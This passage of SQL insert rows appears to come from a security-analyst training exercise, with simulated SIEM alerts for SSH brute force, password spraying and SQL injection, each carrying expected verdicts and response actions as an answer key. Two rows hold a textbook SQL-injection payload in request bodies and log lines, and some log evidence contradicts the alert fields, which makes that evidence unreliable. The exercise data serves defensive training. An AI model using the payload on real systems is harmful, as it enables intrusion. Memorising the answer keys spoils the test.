account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s history of malicious activity indicates a definite attack.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.931Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:20:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.931Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:20:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.931Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:20:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.931Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:20:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.931Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:20:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1665, 'Failed Login Attempts from Unusual Location', 'high', 'Elastic SIEM', 'Multiple login failures from a foreign IP address targeting the internal SSH server indicate a brute force attempt.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:05:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"192.168.1.12\",\"username\":\"guest\",\"hostname\":\"ssh-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"guest\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly used username in attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed attempts and external IP\'s reputation confirm this as a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.932Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"192.168.1.12\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.932Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"192.168.1.12\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.932Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"192.168.1.12\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.932Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"192.168.1.12\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.932Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"192.168.1.12\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1666, 'Potential Password Spraying Detected', 'medium', 'Wazuh', 'A foreign IP address initiated numerous failed login attempts on the company\'s web application.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:30:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"10.0.0.9\",\"username\":\"user2\",\"hostname\":\"web-app\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for engaging in password spraying\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.9\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"user2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The attack pattern and malicious IP reputation confirm this as an attack attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.934Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.934Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.934Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.934Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.934Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1667, 'Web Portal Access Attempt with SQL Injection', 'critical', 'Splunk', 'Detected SQL injection attempt in the request body targeting the internal web portal.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.0.2.45\",\"dst_ip\":\"10.0.0.15\",\"username\":\"none\",\"hostname\":\"web-portal\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP identified in multiple web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The malicious payload and attack signature confirm the SQL injection attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1668, 'SSH Brute Force from Known Bad IP', 'critical', 'Azure Sentinel', 'SSH brute force detected from a high-reputation malicious IP targeting critical infrastructure.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:20:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"10.0.0.20\",\"username\":\"admin\",\"hostname\":\"infrastructure-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username in brute force attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The malicious history of the IP supports the detection of a true positive brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.936Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"infrastructure-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.936Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"infrastructure-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.936Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"infrastructure-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.936Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"infrastructure-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.936Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"infrastructure-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1669, 'Password Spraying Attempt on Corporate Web Portal', 'high', 'Splunk', 'Detected a series of failed login attempts from a single IP address against multiple user accounts on the web portal.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:30:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.0.2.55\",\"dst_ip\":\"192.168.1.25\",\"username\":\"user3\",\"hostname\":\"corporate-portal\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP frequently involved in password spraying\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"user3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The malicious IP reputation and pattern of login attempts confirm the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.938Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:30:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.55\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"user3\\\",\\\"hostname\\\":\\\"corporate-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.938Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:30:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.55\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"user3\\\",\\\"hostname\\\":\\\"corporate-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.938Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:30:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.55\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"user3\\\",\\\"hostname\\\":\\\"corporate-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.938Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:30:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.55\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"user3\\\",\\\"hostname\\\":\\\"corporate-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.938Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:30:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.55\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"user3\\\",\\\"hostname\\\":\\\"corporate-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
